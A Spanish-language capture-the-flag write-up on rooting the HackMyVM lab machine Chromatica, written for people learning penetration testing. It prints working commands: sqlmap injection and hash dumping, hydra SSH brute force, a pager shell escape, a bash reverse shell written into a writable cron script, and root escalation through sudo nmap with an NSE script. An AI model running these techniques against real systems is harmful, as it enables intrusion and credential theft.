cd ~/blog

~/writeups/hmv/104-chromatica.md

104 - Chromatica

easy Linux hmv 29-05-2024
User-Agent gated portalSQL Injection (sqlmap)Pager (--More--) shell escapeWritable cron scriptsudo nmap Privesc
hackmyvm.eu/machines/machine.php?vm=Chromatica

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.23
 nmap -sCV -p22,80,5353 -oN 02-targeted.txt 192.168.1.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-29 22:21 -04
Nmap scan report for 192.168.1.23
Host is up (0.00029s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Chromatica|Coming Soon.....
5353/tcp open  domain  dnsmasq 2.86
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

El robots.txt exige un User-Agent concreto para acceder a /dev-portal/:

 cat robots.txt
user-agent: dev
Allow: /dev-portal/

 curl -H 'user-agent: dev' http://192.168.1.23/dev-portal/
...
<form action="search.php" method="get">
...

El search.php (parámetro city) es vulnerable a SQL Injection. Con sqlmap volcamos la tabla users:

 sqlmap -u 'http://192.168.1.23/dev-portal/search.php?city=p*' -H 'User-Agent: dev' --batch --level=5 --risk=3 --dbs --tables
...
Database: Chromatica
[2 tables]
+--------+
| cities |
| users  |
+--------+

 sqlmap -u 'http://192.168.1.23/dev-portal/search.php?city=p*' -H 'User-Agent: dev' --threads 10 --dump -D Chromatica -T users
...
| 1  | 8d06f5ae0a469178b28bbd34d1da6ef3 | admin     | admin                       |
| 2  | 1ea6762d9b86b5676052d1ebd5f649d7 | dev       | developer account for taz   |
...

Crackeamos los hashes MD5 (crackstation) y hacemos fuerza bruta SSH:

8d06f5ae0a469178b28bbd34d1da6ef3	md5	adm!n
1ea6762d9b86b5676052d1ebd5f649d7	md5	flaghere
3dd0f70a06e2900693fc4b684484ac85	md5	keeptrying
aaf7fb4d4bffb8c8002978a9c9c6ddc9	md5	intern00

 hydra -L users.txt -P passwds.txt 192.168.1.23 ssh -t 64
...
[22][ssh] host: 192.168.1.23   login: dev   password: flaghere
...

La cuenta dev no es de login: al conectar muestra un banner en un pager. Redimensionando la terminal aparece el prompt --More--, del que escapamos a una shell:

--More--(87%)

ESC
!/bin/bash
dev@Chromatica:~$

Obtenemos la primera flag. Para movernos a analyst, hay un cronjob que ejecuta un script escribible:

dev@Chromatica:/$ cat /etc/crontab
...
* *	* * *	analyst /bin/bash /opt/scripts/end_of_day.sh
...

-rwxrwxrw- 1 analyst analyst   30 May 30 03:00 end_of_day.sh

Le inyectamos una reverse shell:

dev@Chromatica:/opt/scripts$ cat end_of_day.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.5/4321 0>&1

 ncat -nlvp 4321
Ncat: Connection from 192.168.1.23:44478.
bash: cannot set terminal process group (3699): Inappropriate ioctl for device
bash: no job control in this shell
analyst@Chromatica:~$

Revisamos sudo -l:

analyst@Chromatica:~$ sudo -l
...
User analyst may run the following commands on Chromatica:
    (ALL : ALL) NOPASSWD: /usr/bin/nmap

nmap permite ejecutar un script NSE; creamos uno que lanza una shell:

analyst@Chromatica:/tmp$ cat pwned
os.execute("/bin/sh")

analyst@Chromatica:/tmp$ sudo nmap --script=pwned
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-30 04:02 UTC
NSE: Warning: Loading 'pwned' -- the recommended file extension is '.nse'.
# whoami
root

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados